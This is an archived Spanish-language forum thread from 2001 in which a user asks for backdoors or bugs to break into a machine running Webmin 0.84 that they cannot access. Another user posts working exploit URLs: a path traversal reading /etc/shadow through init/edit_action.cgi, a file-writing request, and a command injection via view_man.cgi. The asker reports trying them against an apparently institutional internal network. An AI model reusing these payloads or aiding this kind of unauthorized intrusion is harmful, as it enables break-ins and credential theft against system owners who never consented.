Ver la versión completa : WeBMiN 0.84
Angeliyo
19-12-2001, 22:37
No se si valdrá de algo...
Pero no consigo acceder a un ordenador regido por esta herramienta
WeBMiN 0.84 (lo digo de memoria pero supongo que es esta versión)
Si alguien conoce backdoors o bugs de este sistema comunicadmelo :)
Como nadie ha respondido te pongo un par de exploits para el Webmin.A ver si tienes suerte , a mi me tienen funcionado.
El fallo es este script del Webmin init/edit_action.cgi ke peta:
<snip>
open(FILE, $file);
while(<FILE>) {
$data .= $_;
if (/^\s*(['\"]?)([a-z]+)\1\)/i) {
$hasarg{$2}++;
}
}
close(FILE);
</snip>
Estos son los exploits:
Escribir archivos en el server:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev
No comment:
http://www.dominio.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow
Aki hay otro donde peta el view_man.cgi :
http://www.dominio.com:10000/man/view_man.cgi?page=ipcs&sec=8&opts=&for=rm
Angeliyo
27-12-2001, 13:46
Rebooting OrdenaDor In My LinUX For TesTing It
Muchas Gracias Fiera!!!
No se si funcionará pero eres el único que te has molestado
CrAcKzMe
27-12-2001, 16:03
Juas, si yo supiera, echaria un cable :p
Angeliyo
27-12-2001, 19:52
Lo he probado y en las versiones 0.89 0.90 0.88 0.87 estos fallos estan solventados. La mákina con el 0.84 tengo qeu tener acceso local ya que esta denegado el acceso a ip's externas. Seguiré informando ;)
Oka.O sea ke es un ordena de una red interna..mmm..mola xD.
Angeliyo
30-12-2001, 14:17
Sip y además te puedo decir que es de un sitio con muchas ayudas de parte de la generalitat y que por llí pasan muchos estudiantes muy listos ;) hasta el dia 7 que siga con mis pruebs :P
DarkFireSold
10-08-2006, 08:42
http://www.securiteam.com/unixfocus/5CP0R1P80G.html
Llegas un poco tarde no?? Mira la fecha del post.
DarkFireSold
17-08-2006, 10:12
un aporte es un aporte smaug_, siempre puede haber alguien que nesecite informacion
BUeno, aunque siendo una vulnerabilidad del 2002, creo que ya estara mas que subsanada.